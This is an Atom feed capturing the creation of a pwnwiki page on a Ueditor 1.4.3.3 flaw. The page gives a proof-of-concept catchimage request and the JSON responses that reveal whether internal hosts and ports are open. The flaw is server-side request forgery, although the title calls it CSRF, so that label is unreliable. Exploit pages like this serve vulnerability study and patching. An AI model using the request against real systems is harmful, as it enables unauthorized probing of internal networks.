https://pwnwiki.com/index.php?action=history&feed=atom&title=Ueditor_1.4.3.3%E7%89%88%E6%9C%ACCSRF%E6%BC%8F%E6%B4%9E
Ueditor 1.4.3.3版本CSRF漏洞 - Revision history
2026-04-13T16:31:28Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Ueditor_1.4.3.3%E7%89%88%E6%9C%ACCSRF%E6%BC%8F%E6%B4%9E&diff=1761&oldid=prev
Pwnwiki: Created page with "==存在漏洞路徑== <pre> http://localhost:8088/jsp/controller.jsp?action=catchimage&source[]=http://192.168.135.133:8080/test.jpg </pre> ==漏洞利用== 可根據頁面..."
2021-04-20T05:46:31Z
<p>Created page with "==存在漏洞路徑== <pre> http://localhost:8088/jsp/controller.jsp?action=catchimage&source[]=http://192.168.135.133:8080/test.jpg </pre> ==漏洞利用== 可根據頁面..."</p>
<p><b>New page</b></p><div>==存在漏洞路徑==<br />
<pre><br />
http://localhost:8088/jsp/controller.jsp?action=catchimage&source[]=http://192.168.135.133:8080/test.jpg<br />
</pre><br />
<br />
==漏洞利用==<br />
可根據頁面返回的結果不同判斷該地址端口是否開放:<br />
<br />
如果抓取不存在的圖片地址時,頁面返回{"state": "SUCCESS", list: [{"state":"\u8fdc\u7a0b\u8fde\u63a5\u51fa\u9519"} ]},即state為“遠程連接出錯”。<br />
<br />
如果成功抓取到圖片,頁面返回{"state": "SUCCESS", list: [{"state": "SUCCESS","size":"5103","source":"http://192.168.135.133 :8080/tomcat.png","title":"1527173588127099881.png","url":"/ueditor/jsp/upload/image/20180524/1527173588127099881.png"} ]},即state為“SUCCESS”。<br />
<br />
如果主機無法訪問,頁面返回{"state":"SUCCESS", list: [{"state": "\u6293\u53d6\u8fdc\u7a0b\u56fe\u7247\u5931\u8d25"}]},即state為“抓取遠程圖片失敗”。<br />
<br />
<br />
由於除了在config.js中的catcherLocalDomain配置了過濾的地址外,沒有針對內部地址進行過濾,所以可以根據抓取遠程圖片返回結果的不同,來進行內網的探測。</div>
Pwnwiki